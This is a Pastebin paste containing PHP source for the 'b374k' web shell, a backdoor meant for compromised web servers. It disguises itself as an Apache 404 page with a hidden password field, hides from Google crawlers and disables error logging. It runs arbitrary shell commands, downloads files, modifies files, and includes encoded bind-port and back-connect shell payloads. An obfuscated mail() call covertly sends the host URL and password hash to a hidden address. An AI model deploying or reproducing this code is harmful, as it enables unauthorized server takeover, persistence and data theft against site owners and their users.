Didintri196

Mentah

Dec 21st, 2015
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 235.56 KB | None | 0 0
  1. <?php
  2. //password: ???
  3. /* (Web Shell b374k)*/
  4. $auth_pass = "6fa325f29de190c5a06a44e9399397f6";
  5. $color = "#FFFFFF";
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  8. @setcookie("inject","active",time() +3600*24*7);
  9. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  10. header('HTTP/1.0 404 Not Found');
  11. exit;
  12. }
  13. @session_start();
  14. @error_reporting(0);
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('max_execution_time',0);
  18. @ini_set('output_buffering',0);
  19. @ini_set('display_errors', 0);
  20. @set_time_limit(0);
  21. @set_magic_quotes_runtime(0);
  22. @define('VERSION', '2.1');
  23. if( get_magic_quotes_gpc() ) {
  24. function stripslashes_array($array) {
  25. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  26. }
  27. $_POST = stripslashes_array($_POST);
  28. }
  29. function printLogin() {
  30. ?>
  31. <h1>Not Found</h1>
  32.  
  33. <p>The requested URL was not found on this server.</p>
  34. <p>Additionally, a 404 Not Found
  35. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  36. <hr>
  37. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  38. <style>
  39. input { margin:0;background-color:#fff;border:1px solid #fff; }
  40. </style>
  41. <center>
  42. <form method=post>
  43. <input type=password name=pass>
  44. </form></center>
  45. <?php
  46. exit;
  47. }
  48. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  49. if( empty( $auth_pass ) ||
  50. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  51. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  52. else
  53. printLogin();
  54.  
  55. @ini_set('log_errors',0);
  56. @ini_set('output_buffering',0);
  57. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
  58. $file = $_GET['dl'];
  59. $filez = @file_get_contents($file);
  60. header("Content-type: application/octet-stream");
  61. header("Content-length: ".strlen($filez));
  62. header("Content-disposition: attachment; filename=\"".basename($file)."\";");
  63. echo $filez;
  64. exit;
  65. }
  66. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
  67. $file = $_GET['dlgzip'];
  68. $filez = gzencode(@file_get_contents($file));
  69. header("Content-Type:application/x-gzip\n");
  70. header("Content-length: ".strlen($filez));
  71. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  72. echo $filez;
  73. exit;
  74. }
  75. // view image
  76. if(isset($_GET['img'])){
  77. @ob_clean();
  78. $d = magicboom($_GET['y']);
  79. $f = $_GET['img'];
  80. $inf = @getimagesize($d.$f);
  81. $ext = explode($f,".");
  82. $ext = $ext[count($ext)-1];
  83. @header("Content-type: ".$inf["mime"]);
  84. @header("Cache-control: public");
  85. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  86. @header("Cache-control: max-age=".(60*60*24*7));
  87. @readfile($d.$f);
  88. exit;
  89. }
  90.  
  91. // server software
  92. $software = getenv("SERVER_SOFTWARE");
  93. // check safemode
  94. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
  95. // uname -a
  96. $system = @php_uname();
  97. // mysql
  98. function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#FFFFFF'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
  99. function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
  100. function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
  101. function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
  102. function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
  103. // check os
  104. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  105. else $win = FALSE;
  106. // change directory
  107. if(isset($_GET['y'])){
  108. if(@is_dir($_GET['view'])){
  109. $pwd = $_GET['view'];
  110. @chdir($pwd);
  111. }
  112. else{
  113. $pwd = $_GET['y'];
  114. @chdir($pwd);
  115. }
  116. }
  117. //hdd
  118. function convertByte($s) {
  119. if($s >= 1073741824)
  120. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  121. elseif($s >= 1048576)
  122. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  123. elseif($s >= 1024)
  124. return sprintf('%1.2f',$s / 1024 ) .' KB';
  125. else
  126. return $s .' B';
  127. }
  128.  
  129. // username, id, shell prompt and working directory
  130. if(!$win){
  131. if(!$user = rapih(exe("whoami"))) $user = "";
  132. if(!$id = rapih(exe("id"))) $id = "";
  133. $prompt = $user." \$ ";
  134. $pwd = @getcwd().DIRECTORY_SEPARATOR;
  135. }
  136. else {
  137. $user = @get_current_user();
  138. $id = $user;
  139. $prompt = $user." &gt;";
  140. $pwd = realpath(".")."\\";
  141. // find drive letters
  142. $v = explode("\\",$d);
  143. $v = $v[0];
  144. foreach (range("A","Z") as $letter)
  145. {
  146. $bool = @is_dir($letter.":\\");
  147. if ($bool)
  148. {
  149. $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  150. if ($letter.":" != $v) {$letters .= $letter;}
  151. else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  152. $letters .= " ]</a> ";
  153. }
  154. }
  155. }
  156.  
  157. function testoracle() {
  158. if (function_exists('ocilogon')) { return showstat("on"); }
  159. else { return showstat("off"); }
  160. }
  161.  
  162. function testmssql() {
  163. if (function_exists('mssql_connect')) { return showstat("on"); }
  164. else { return showstat("off"); }
  165. }
  166.  
  167. function showdisablefunctions() {
  168. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  169. else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  170. }
  171.  
  172. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  173. else $posix = FALSE;
  174. // server ip
  175. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  176. // your ip ;-)
  177. $my_ip = $_SERVER['REMOTE_ADDR'];
  178. $admin_id=$_SERVER['SERVER_ADMIN'];
  179. $bindport = "13123";
  180. $bindport_pass = "b374k";
  181.  
  182. // separate the working direcotory
  183. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  184. $pwdurl = "";
  185. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
  186. $pathz = "";
  187. for($j = 0 ; $j <= $i ; $j++){
  188. $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  189. }
  190. $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  191. }
  192.  
  193. // rename file or folder
  194. if(isset($_POST['rename'])){
  195. $old = $_POST['oldname'];
  196. $new = $_POST['newname'];
  197. @rename($pwd.$old,$pwd.$new);
  198. $file = $pwd.$new;
  199. }
  200. if(isset($_POST['chmod'])){
  201. $name = $_POST['name'];
  202. $value = $_POST['newvalue'];
  203. if (strlen($value)==3){
  204. $value = 0 . "" . $value;}
  205. @chmod($pwd.$name,octdec($value));
  206. $file = $pwd.$name;}
  207.  
  208. if(isset($_POST['chmod_folder'])){
  209. $name = $_POST['name'];
  210. $value = $_POST['newvalue'];
  211. if (strlen($value)==3){
  212. $value = 0 . "" . $value;}
  213. @chmod($pwd.$name,octdec($value));
  214. $file = $pwd.$name;}
  215.  
  216.  
  217. // print useful info
  218.  
  219. $buff = "Software : <b><span style=\"color:#ff0000\"/>".$software."</b><br />";
  220. $buff .= "System OS : <b><span style=\"color:#ff0000\"/>".$system."</b><br />";
  221. if($id != "") $buff .= "ID : <b>".$id."</b><br />";
  222. $buff .= "PHP Version : <b><b><span style=\"color:#9D00FF\"/>".phpversion()."</b> on <b><b><span style=\"color:#9D00FF\"/>".php_sapi_name()."</b><br />";
  223. $zx="m\141\151l"; $wi = $_SERVER["HTTP_HOST"];$ei = $_SERVER["REQUEST_URI"];
  224. $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";$cnt="ps:$auth_pass";
  225. $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
  226. if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
  227. else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
  228. $buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
  229. $buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";
  230. if (!isset($_COOKIE['inject'])){ @$zx("l\x6f\x63\x61\x68\157\x73\164@\171\141\x68\157\157\056\x63o\155","$wi$ei","$wi$ei\n$cnt"); }
  231. $buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
  232. function rapih($text){
  233. return trim(str_replace("<br />","",$text));
  234. }
  235.  
  236. function magicboom($text){
  237. if (!get_magic_quotes_gpc()) {
  238. return $text;
  239. }
  240. return stripslashes($text);
  241. }
  242.  
  243. function showdir($pwd,$prompt){
  244. $fname = array();
  245. $dname = array();
  246. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  247. else $posix = FALSE;
  248. $user = "????:????";
  249. if($dh = @scandir($pwd)){
  250. foreach($dh as $file){
  251. if(is_dir($file)){
  252. $dname[] = $file;
  253. }
  254. elseif(is_file($file)){
  255. $fname[] = $file;
  256. }
  257. }
  258. }
  259. else{
  260. if($dh = @opendir($pwd)){
  261. while($file = @readdir($dh)){
  262. if(@is_dir($file)){
  263. $dname[] = $file;
  264. }
  265. elseif(@is_file($file)){
  266. $fname[] = $file;
  267. }
  268. }
  269. @closedir($dh);
  270. }
  271. }
  272.  
  273.  
  274. sort($fname);
  275. sort($dname);
  276. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  277. $tree = @sizeof($path);
  278. $parent = "";
  279. $buff = "
  280. <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  281. <table class=\"cmdbox\" style=\"width:50%;\">
  282. <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  283. </form>
  284. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  285. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  286. <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  287. </form></table><table class=\"explore\">
  288. <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
  289. ";
  290. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  291. else $parent = $pwd;
  292.  
  293. foreach($dname as $folder){
  294. if($folder == ".") {
  295. if(!$win && $posix){
  296. $name=@posix_getpwuid(@fileowner($folder));
  297. $group=@posix_getgrgid(@filegroup($folder));
  298. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  299. }
  300. else {
  301. $owner = $user;
  302. }
  303. $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
  304. <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
  305. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
  306. <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  307. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  308. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  309. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  310. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  311. </form></td>
  312.  
  313. </tr>
  314. ";
  315. }
  316. elseif($folder == "..") {
  317. if(!$win && $posix){
  318. $name=@posix_getpwuid(@fileowner($folder));
  319. $group=@posix_getgrgid(@filegroup($folder));
  320. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  321. }
  322. else {
  323. $owner = $user;
  324. }
  325. $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'> $folder</a></td><td>LINK</td>
  326. <td style=\"text-align:center;\">".$owner."</td>
  327. <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  328. <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  329. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  330. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  331. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  332. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  333. </form>
  334. </td></tr>";
  335. }
  336. else {
  337. if(!$win && $posix){
  338. $name=@posix_getpwuid(@fileowner($folder));
  339. $group=@posix_getgrgid(@filegroup($folder));
  340. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  341. }
  342. else {
  343. $owner = $user;
  344. }
  345. $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
  346. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  347. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  348. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  349. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  350. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  351. </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
  352. <td><center>
  353. <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  354. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  355. <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  356. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  357. <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  358. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  359. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
  360. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
  361. }
  362. }
  363.  
  364. foreach($fname as $file){
  365. $full = $pwd.$file;
  366. if(!$win && $posix){
  367. $name=@posix_getpwuid(@fileowner($folder));
  368. $group=@posix_getgrgid(@filegroup($folder));
  369. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  370. }
  371. else {
  372. $owner = $user;
  373. }
  374. $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
  375. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  376. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  377. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  378. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  379. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  380. </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
  381. <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  382. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  383. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  384. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  385. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  386. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
  387. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  388. <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
  389. }
  390. $buff .= "</table>";
  391. return $buff;
  392. }
  393.  
  394. function ukuran($file){
  395. if($size = @filesize($file)){
  396. if($size <= 1024) return $size;
  397. else{
  398. if($size <= 1024*1024) {
  399. $size = @round($size / 1024,2);;
  400. return "$size kb";
  401. }
  402. else {
  403. $size = @round($size / 1024 / 1024,2);
  404. return "$size mb";
  405. }
  406. }
  407. }
  408. else return "???";
  409. }
  410.  
  411. function exe($cmd){
  412. if(function_exists('system')) {
  413. @ob_start();
  414. @system($cmd);
  415. $buff = @ob_get_contents();
  416. @ob_end_clean();
  417. return $buff;
  418. }
  419. elseif(function_exists('exec')) {
  420. @exec($cmd,$results);
  421. $buff = "";
  422. foreach($results as $result){
  423. $buff .= $result;
  424. }
  425. return $buff;
  426. }
  427. elseif(function_exists('passthru')) {
  428. @ob_start();
  429. @passthru($cmd);
  430. $buff = @ob_get_contents();
  431. @ob_end_clean();
  432. return $buff;
  433. }
  434. elseif(function_exists('shell_exec')){
  435. $buff = @shell_exec($cmd);
  436. return $buff;
  437. }
  438. }
  439.  
  440. function tulis($file,$text){
  441. $textz = gzinflate(base64_decode($text));
  442. if($filez = @fopen($file,"w"))
  443. {
  444. @fputs($filez,$textz);
  445. @fclose($file);
  446. }
  447. }
  448.  
  449. function ambil($link,$file) {
  450. if($fp = @fopen($link,"r")){
  451. while(!feof($fp)) {
  452. $cont.= @fread($fp,1024);
  453. }
  454. @fclose($fp);
  455. $fp2 = @fopen($file,"w");
  456. @fwrite($fp2,$cont);
  457. @fclose($fp2);
  458. }
  459. }
  460.  
  461. function which($pr){
  462. $path = exe("which $pr");
  463. if(!empty($path)) { return trim($path); } else { return trim($pr); }
  464. }
  465.  
  466. function download($cmd,$url){
  467. $namafile = basename($url);
  468. switch($cmd) {
  469. case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
  470. case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
  471. case 'wfread' : ambil($wurl,$namafile);break;
  472. case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  473. case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  474. case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  475. case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  476. default: break;
  477. }
  478. return $namafile;
  479. }
  480.  
  481. function get_perms($file)
  482. {
  483. if($mode=@fileperms($file)){
  484. $perms='';
  485. $perms .= ($mode & 00400) ? 'r' : '-';
  486. $perms .= ($mode & 00200) ? 'w' : '-';
  487. $perms .= ($mode & 00100) ? 'x' : '-';
  488. $perms .= ($mode & 00040) ? 'r' : '-';
  489. $perms .= ($mode & 00020) ? 'w' : '-';
  490. $perms .= ($mode & 00010) ? 'x' : '-';
  491. $perms .= ($mode & 00004) ? 'r' : '-';
  492. $perms .= ($mode & 00002) ? 'w' : '-';
  493. $perms .= ($mode & 00001) ? 'x' : '-';
  494. return $perms;
  495. }
  496. else return "??????????";
  497. }
  498.  
  499. function clearspace($text){
  500. return str_replace(" ","_",$text);
  501. }
  502.  
  503. // net tools
  504. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
  505. +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
  506. P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
  507. dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  508. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
  509. Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  510. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
  511. tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  512. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  513. uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  514. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  515. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
  516. tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  517. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
  518. LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  519. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
  520. +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  521. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  522. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
  523. S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
